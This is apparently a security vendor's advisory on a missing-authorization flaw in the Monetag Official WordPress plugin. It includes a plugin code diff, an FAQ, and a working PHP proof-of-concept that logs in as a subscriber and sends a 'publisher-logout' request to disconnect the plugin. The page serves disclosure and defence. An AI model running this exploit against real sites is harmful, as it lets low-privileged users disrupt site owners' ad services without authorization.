+	const OPTION_NAME_PUBLISHER_ZONES = 'ads-option-publisher-zones';
+	const OPTION_NAME_PUBLISHER_ZONES_LAST_UPDATE = 'ads-option-publisher-zones-last-update';

 	const DIRECTION_ONCLICK = 'onclick';
 	const DIRECTION_INTERSTITIAL = 'interstitial';
@@ -40,67 +40,54 @@
 	 *
 	 * @var Ads_Anti_Adblock_Client
 	 */
-	private $client;
+	private $aab_client;

-	/**
-	 * Options helper instance
-	 *
-	 * @var Ads_Options
-	 */
-	private $options;
-
-	public function __construct($plugin_name, $version)
+	public function __construct($plugin_name)
 	{
-		$this->client = new Ads_Anti_Adblock_Client($plugin_name, $version);
-		$this->options = new Ads_Options($plugin_name, Ads_Options::SECTION_ID_ZONES);
+		$this->aab_client = new Ads_Anti_Adblock_Client($plugin_name);
 	}

 	/**
 	 * Update publisher zone list and store it in database
 	 *
-	 * @return void
+	 * @return bool
 	 */
 	public function update_publisher_zones()
 	{
-		$this->options->update_option(self::OPTION_ID_LAST_UPDATE_TIME, time());
-
-		$zones = $this->client->get_publisher_zones();
+		$zoneList = $this->aab_client->get_publisher_zones();

-		if ($zones !== null) {
-			$this->options->update_option(
-				self::OPTION_ID_LIST,
-				json_encode($this->filter_zone_list($zones))
-			);
-		} else {
-			$this->options->delete_option(self::OPTION_ID_LIST);
+		if ($zoneList !== null) {
+			return update_option(self::OPTION_NAME_PUBLISHER_ZONES, json_encode($this->filter_zone_list($zoneList)));
 		}
+
+		return delete_option(self::OPTION_NAME_PUBLISHER_ZONES);
 	}

 	/**
 	 * Update publisher zone list and store it in database
 	 *
-	 * @return array|null
+	 * @return bool
 	 */
 	public function create_publisher_zone($token, $publisherSiteId, $data)
 	{
-		return $this->client->create_publisher_zone($token, $publisherSiteId, $data);
+		return $this->aab_client->create_publisher_zone($token, $publisherSiteId, $data);
 	}

 	/**
 	 * Remove zones with not allowed ads direction
 	 *
-	 * @param array $zone_list
+	 * @param array $zoneList
 	 * @return array
 	 */
-	private function filter_zone_list($zone_list)
+	private function filter_zone_list($zoneList)
 	{
-		foreach ($zone_list as $direction_name => $zones) {
+		foreach ($zoneList as $direction_name => $zones) {
 			if (!in_array($direction_name, self::$allowed_directions, true)) {
-				unset($zone_list[$direction_name]);
+				unset($zoneList[$direction_name]);
 			}
 		}

-		return $zone_list;
+		return $zoneList;
 	}

 	/**
@@ -138,16 +125,16 @@

 		return $groupZones;
 	}
-	/**
+	/**
 	 * Check if direction has zones
-	 *
-	 * @return bool
+	 *
+	 * @return boolean
 	 */
 	public function direction_has_zones($direction)
 	{
-		$zones = $this->get_publisher_zones();
+		$zoneList = $this->get_publisher_zones();

-		return !empty($zones[$direction]);
+		return !empty($zoneList[$direction]);
 	}

 	/**
@@ -171,25 +158,20 @@
 	 */
 	public function get_publisher_zones()
 	{
-		$zones = $this->options->get_option(self::OPTION_ID_LIST);
+		$zoneList = get_option(self::OPTION_NAME_PUBLISHER_ZONES);

-		if ($zones) {
-			$zones = json_decode($zones, true);
+		if ($zoneList) {
+			$zoneList = json_decode($zoneList, true);
 		} else {
-			$this->options->update_option(self::OPTION_ID_LAST_UPDATE_TIME, time());
-
-			$zones = $this->client->get_publisher_zones();
-			if ($zones !== null) {
-				$this->options->update_option(
-					self::OPTION_ID_LIST,
-					json_encode($this->filter_zone_list($zones))
-				);
+			$zoneList = $this->aab_client->get_publisher_zones();
+			if ($zoneList !== null) {
+				update_option(self::OPTION_NAME_PUBLISHER_ZONES, json_encode($this->filter_zone_list($zoneList)));
 			} else {
 				return array();
 			}
 		}

-		return $zones;
+		return $zoneList;
 	}

 	/**
@@ -200,10 +182,10 @@
 	 */
 	public function is_anti_adblock_zone($zoneId)
 	{
-		$zones = $this->get_publisher_zone_list();
+		$zoneList = $this->get_publisher_zone_list();

-		if (isset($zones[$zoneId])) {
-			return (bool) $zones[$zoneId]['is_antiadblock'];
+		if (array_key_exists($zoneId, $zoneList)) {
+			return (bool) $zoneList[$zoneId]['is_antiadblock'];
 		}

 		return false;
@@ -223,10 +205,10 @@
 	 */
 	public function get_publisher_zone_list()
 	{
-		$zone_list = $this->get_publisher_zones();
+		$zoneList = $this->get_publisher_zones();
 		$result = array();

-		foreach ($zone_list as $direction_name => $zones) {
+		foreach ($zoneList as $direction_name => $zones) {
 			foreach ($zones as $zone) {
 				$result[$zone['id']] = $zone;
 			}
@@ -272,30 +254,8 @@
 	 *
 	 * @return array
 	 */
-	public static function get_allowed_directions()
+	public function get_allowed_directions()
 	{
 		return self::$allowed_directions;
 	}
-
-	/**
-	 * Drop zone options
-	 *
-	 * @return void
-	 */
-	public function clear_plugin_options()
-	{
-		$this->options->delete_option(self::OPTION_ID_LIST);
-		$this->options->delete_option(self::OPTION_ID_LAST_UPDATE_TIME);
-	}
-
-	/**
-	 * Drop legacy publisher zone options
-	 *
-	 * @return void
-	 */
-	public function clear_legacy_options()
-	{
-		delete_option('ads-option-publisher-zones');
-		delete_option('ads-option-publisher-zones-last-update');
-	}
 }
--- a/monetag-official/includes/class-ads.php
+++ b/monetag-official/includes/class-ads.php
@@ -35,16 +35,10 @@
 	 */
 	public function __construct()
 	{
-		$this->load_dependencies();
-
-		if (defined('MONETAG_VERSION')) {
-			$this->version = MONETAG_VERSION;
-		} else {
-			$this->version = Monetag_Meta::VERSION;
-		}
-
-		$this->plugin_name = Monetag_Meta::NAME;
+		$this->plugin_name = 'monetag';
+		$this->version = '1.0.0';

+		$this->load_dependencies();
 		$this->set_locale();
 		$this->define_admin_hooks();
 		$this->define_public_hooks();
@@ -65,17 +59,15 @@
 	 */
 	private function load_dependencies()
 	{
-		require_once plugin_dir_path(__DIR__) . 'includes/class-monetag-meta.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-loader.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-i18n.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-settings-helper.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-anti-adblock.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-anti-adblock-client.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-zone-helper.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-options.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-messages.php';
-		require_once plugin_dir_path(__DIR__) . 'admin/class-ads-admin.php';
-		require_once plugin_dir_path(__DIR__) . 'public/class-ads-public.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-loader.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-i18n.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-settings-helper.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-anti-adblock.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-anti-adblock-client.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-zone-helper.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'includes/class-ads-messages.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'admin/class-ads-admin.php';
+		require_once plugin_dir_path(dirname(__FILE__)) . 'public/class-ads-public.php';

 		$this->loader = new Ads_Loader();
 	}
@@ -118,6 +110,7 @@
 		$this->loader->add_action('update_option_Ads_general_token', $plugin_admin, 'action_save_publisher_token');
 		$this->loader->add_action('update_option_Ads_nativeads_zone_id', $plugin_admin, 'action_save_nativeads_zone_id');
 		$this->loader->add_action('in_plugin_update_message-ads/ads.php', $plugin_admin,'action_in_plugin_update');
+
 	}

 	/**
@@ -147,7 +140,7 @@
 	 */
 	private function define_public_hooks()
 	{
-		$plugin_public = new Ads_Public($this->get_plugin_name(), $this->get_version());
+		$plugin_public = new Ads_Public($this->get_plugin_name());

 		$this->loader->add_filter('wp_head', $plugin_public, 'insert_verification_code');
 		$this->loader->add_filter('wp_footer', $plugin_public, 'publish_tags');
@@ -162,4 +155,14 @@
 	{
 		$this->loader->run();
 	}
+
+	/**
+	 * The reference to the class that orchestrates the hooks with the plugin.
+	 *
+	 * @return Ads_Loader Orchestrates the hooks of the plugin.
+	 */
+	public function get_loader()
+	{
+		return $this->loader;
+	}
 }
--- a/monetag-official/includes/class-monetag-meta.php
+++ b/monetag-official/includes/class-monetag-meta.php
@@ -1,7 +0,0 @@
-<?php
-
-class Monetag_Meta
-{
-	const NAME = 'monetag';
-	const VERSION = '1.1.3';
-}
--- a/monetag-official/includes/class-monetag-uninstall.php
+++ b/monetag-official/includes/class-monetag-uninstall.php
@@ -1,57 +0,0 @@
-<?php
-
-class Monetag_Uninstall
-{
-	/**
-	 * Settings helper instance
-	 *
-	 * @var Ads_Settings_Helper
-	 */
-	private $settings_helper;
-
-	/**
-	 * Zone helper instance
-	 *
-	 * @var Ads_Zone_Helper
-	 */
-	private $zone_helper;
-
-	/**
-	 * AntiAdBlock service instance
-	 *
-	 * @var Ads_Anti_Adblock
-	 */
-	private $aab_service;
-
-	public function __construct()
-	{
-		$this->load_dependencies();
-
-		$this->settings_helper = new Ads_Settings_Helper(Monetag_Meta::NAME);
-		$this->zone_helper = new Ads_Zone_Helper(Monetag_Meta::NAME, Monetag_Meta::VERSION);
-		$this->aab_service = new Ads_Anti_Adblock(Monetag_Meta::NAME, Monetag_Meta::VERSION);
-	}
-
-	public function run()
-	{
-		$zones = $this->settings_helper->get_zones_directions();
-
-		$this->settings_helper->clear_plugin_options();
-		$this->settings_helper->clear_zone_settings();
-
-		$this->aab_service->clear_zone_tags_cache($zones);
-
-		$this->zone_helper->clear_plugin_options();
-		$this->zone_helper->clear_legacy_options();
-	}
-
-	private function load_dependencies()
-	{
-		require_once plugin_dir_path(__DIR__) . 'includes/class-monetag-meta.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-settings-helper.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-anti-adblock.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-anti-adblock-client.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-zone-helper.php';
-		require_once plugin_dir_path(__DIR__) . 'includes/class-ads-options.php';
-	}
-}
--- a/monetag-official/public/class-ads-public.php
+++ b/monetag-official/public/class-ads-public.php
@@ -28,13 +28,12 @@

 	/**
 	 * @param string $plugin_name The name of the plugin.
-	 * @param string $version     Version of the plugin.
 	 */
-	public function __construct($plugin_name, $version)
+	public function __construct($plugin_name)
 	{
 		$this->setting_helper = new Ads_Settings_Helper($plugin_name);
-		$this->anti_adblock = new Ads_Anti_Adblock($plugin_name, $version);
-		$this->zone_helper = new Ads_Zone_Helper($plugin_name, $version);
+		$this->anti_adblock = new Ads_Anti_Adblock($plugin_name);
+		$this->zone_helper = new Ads_Zone_Helper($plugin_name);
 	}

 	/**
@@ -47,7 +46,7 @@
 			return;
 		}

-		foreach ( Ads_Zone_Helper::get_allowed_directions() as $direction ) {
+		foreach ( $this->zone_helper->get_allowed_directions() as $direction ) {
 			// ignore not activated directions
 			if (!$this->setting_helper->get_field_value( $direction, 'enabled') ) {
 				continue;
@@ -89,7 +88,7 @@
 			),
 		);

-		foreach ( Ads_Zone_Helper::get_allowed_directions() as $direction ) {
+		foreach ( $this->zone_helper->get_allowed_directions() as $direction ) {
 			// ignore not activated directions
 			if (!$this->setting_helper->get_field_value( $direction, 'enabled') ) {
 				continue;
@@ -140,7 +139,7 @@
 		$verification_code = $this->setting_helper->get_verification_code();
 		if ($verification_code !== false) {
 			?>
-			<meta name="monetag" content="<?php echo esc_attr( $verification_code ); ?>" />
+			<meta name="propeller" content="<?php echo esc_attr( $verification_code ); ?>" />
 			<?php
 		}
 	}
--- a/monetag-official/uninstall.php
+++ b/monetag-official/uninstall.php
@@ -21,15 +21,8 @@
  */

 // If uninstall not called from WordPress, then exit.
-if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) {
+if (!defined('WP_UNINSTALL_PLUGIN')) {
 	exit;
 }

-if ( is_multisite() ) {
-	exit;
-}
-
-require plugin_dir_path( __FILE__ ) . 'includes/class-monetag-uninstall.php';
-
-$uninstall = new Monetag_Uninstall();
-$uninstall->run();
+// TODO: remove options here

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24551 - Monetag Official <= 1.1.3 - Missing Authorization

<?php

$target_url = 'https://target.com/wp-admin/index.php';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Initialize cURL session for WordPress login
$ch = curl_init();

// First, authenticate to WordPress to get cookies
$login_url = str_replace('/wp-admin/index.php', '/wp-login.php', $target_url);
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);

// Check if login was successful by looking for admin bar or dashboard elements
if (strpos($response, 'wp-admin-bar') === false && strpos($response, 'dashboard') === false) {
    echo "[!] Login failed. Check credentials.n";
    exit;
}

echo "[+] Successfully authenticated as subscriber.n";

// Now exploit the missing authorization vulnerability
$exploit_url = $target_url . '?publisher-logout=1';
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_HTTPGET, 1);

$response = curl_exec($ch);

// Check for successful logout by looking for confirmation message
if (strpos($response, 'Logout successful') !== false || strpos($response, 'Settings Updated') !== false) {
    echo "[+] SUCCESS: Plugin logout triggered. Monetag plugin disconnected.n";
    echo "[+] The plugin's authentication token and zone settings have been cleared.n";
} else {
    echo "[-] Exploit may have failed. Check if plugin is active and connected.n";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-24551?
Understanding the vulnerability
CVE-2026-24551 is a medium severity vulnerability in the Monetag Official plugin for WordPress, affecting versions up to and including 1.1.3. It allows authenticated users with subscriber-level access to perform unauthorized actions, specifically logging out the plugin from its Monetag account due to a missing capability check.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability exists in the admin URL handler of the Monetag plugin, where it processes logout requests without verifying user permissions. An attacker can exploit this by sending a crafted GET request to the admin page with the ‘publisher-logout’ parameter, allowing them to disconnect the plugin from its account.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Monetag Official plugin version 1.1.3 or earlier is affected. Authenticated users with subscriber-level permissions or higher can exploit this vulnerability, potentially disrupting the plugin’s functionality.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the Monetag Official plugin installed. If it is version 1.1.3 or earlier, your site is at risk. You can find the plugin version in the WordPress admin dashboard under Plugins.
How can I fix or mitigate this issue?
Applying the patch
To fix this vulnerability, update the Monetag Official plugin to version 2.2.5 or later, where the issue has been patched. Regularly updating all plugins and themes is a best practice to mitigate security risks.
What does the risk level 'Medium' mean?
Understanding severity ratings
A medium risk level indicates that the vulnerability can be exploited by authenticated users to cause disruption, but it does not allow for full administrative access. While it may not lead to immediate severe consequences, it can impact site functionality and require administrative intervention.
What is the CVSS score for this vulnerability?
Context of the CVSS score
The CVSS score for CVE-2026-24551 is 4.3, which categorizes it as medium severity. This score reflects the potential impact and exploitability of the vulnerability, indicating that it poses a moderate risk to affected systems.
How does the proof of concept demonstrate the issue?
Exploit demonstration
The proof of concept provided illustrates how an attacker can authenticate as a subscriber and send a GET request with the ‘publisher-logout’ parameter to log out the plugin. This demonstrates the lack of authorization checks and how easily the vulnerability can be exploited.
What actions should I take if I am unable to update the plugin?
Alternative mitigation strategies
If you cannot update the plugin immediately, consider disabling it temporarily to prevent exploitation. Additionally, review user permissions and limit access to only trusted users until the plugin can be updated.
What are the consequences of a successful exploit?
Impact of exploitation
Successful exploitation allows low-privileged users to disconnect the Monetag plugin from its service, disrupting ad serving capabilities. This can lead to loss of revenue and require manual reconfiguration by an administrator to restore functionality.
Are there any other security measures I should consider?
Enhancing overall security
In addition to updating vulnerable plugins, consider implementing security plugins that monitor user actions and log unauthorized attempts. Regularly audit user roles and permissions to ensure only necessary access is granted.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations